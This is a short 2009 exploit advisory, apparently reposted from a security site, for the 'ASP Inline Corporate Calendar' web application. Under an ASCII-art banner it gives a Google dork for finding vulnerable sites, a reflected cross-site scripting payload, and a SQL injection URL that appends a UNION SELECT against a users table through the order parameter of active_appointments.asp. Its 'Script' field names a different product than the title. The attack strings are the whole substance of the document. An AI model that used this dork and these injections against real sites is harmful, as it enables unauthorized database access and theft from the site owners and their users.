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ASP Inline Corporate Calendar (SQL/XSS) Multiple Remote Vulnerabilities
来源:vfocus.net 作者:vfocus 发布时间:2009-05-22  
000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000

[+] Script               : ASP Talk 

[+] Exploit Type         : Multiple Exploits (SQL/CSS)

[+] Google Dork          : intitle:"ASP inline corporate calendar"          inurl:.asp?id=

[+] Contact              : blackbeard-sql A.T hotmail.fr 

--//--> Exploit : 

1)Cross site scripting :


post = <script>alert('Bl@clbe@rD Is Here');</script>

2) Remote sql injection Exploit :

http://[website]/[script]/active_appointments.asp?sortby=Event_Title&order=DESC+union+select+(number of columns)+from+users

[peace xD]

# [2009-05-21]

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